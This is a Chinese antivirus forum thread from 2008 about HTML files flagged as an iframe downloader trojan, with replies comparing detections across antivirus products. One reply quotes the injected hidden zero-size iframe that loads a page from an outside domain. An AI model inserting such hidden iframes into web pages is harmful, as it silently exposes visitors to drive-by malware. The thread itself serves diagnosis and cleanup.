一个微点不报而卡巴查出的木马——Trojan-Downloader.HTML.IFrame.ay

岚星

比较奇怪的问题……

我用卡巴查出机器上N多HTML文档都中了Trojan-Downloader.HTML.IFrame.ay病毒。但微点没有报过。

微点是最新版，卡巴也是（紫狐绿色版，平时不开，定期全扫，以前没有报过这个病毒）。XP+SP2，机器没有出现任何中招情况。此病毒名称在网上没有查到，但卡巴报木马而非恶意脚本。卡巴清除失败。文件打开时正常——卡巴（无监控）、微点都不报。

不清楚是微点的漏杀还是卡巴的误报……有兴趣的请帮忙试试看。谢谢～



[ 本帖最后由 岚星 于 2008-1-2 15:04 编辑 ]

xiaohf

小红伞没报
可能是误报

rainchen0399

NOD32报病毒  WIN32\fujacks病毒

忧郁浪子

1. <iframe src=http://wm.168080.com/wm/wm.htm width=0 height=0></iframe>

复制代码

是因为以上代码报的 代码本身对计算机没有危害动作 自然不会报
只是上边那个页面不知道会不会有木马 正常的写作规范是不会在</html>结束后再加上iframe框架的

[ 本帖最后由 忧郁浪子 于 2008-1-2 15:40 编辑 ]

忧郁浪子

晕了 编辑帖子怎么都编辑不上

补充一下： 我这里打不开代码里的那个页面 这样就是对计算机无害了

岚星

原来是这样……也不知道什么时候弄上去的，ms我电脑里那些HTML文档全中了这个……

不过仅仅这段代码，KAV清除起来应该很方便啊……怎么会显示无法清除病毒，只能选删除或跳过呢……

Nblock

程序没有产生病毒行为  微点是无法进行行为判断的  楼主的系统之前遭遇过病毒~  
请实时开启微点 打好操作系统补丁+应用软件漏洞补丁   用下面这个工具全盘清除下 ：

[ 本帖最后由 Nblock 于 2008-1-2 19:36 编辑 ]

maliao198

不止微点不报···驱逐舰也不报

Graybird

The file '########.htm' has been determined to be 'MALWARE'. Our analysts named the threat HTML/Infected.WebPage.Gen. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.This malware is detected by a special detection routine from the engine module.

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.DL.HTML.Ieframe.b

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.25.22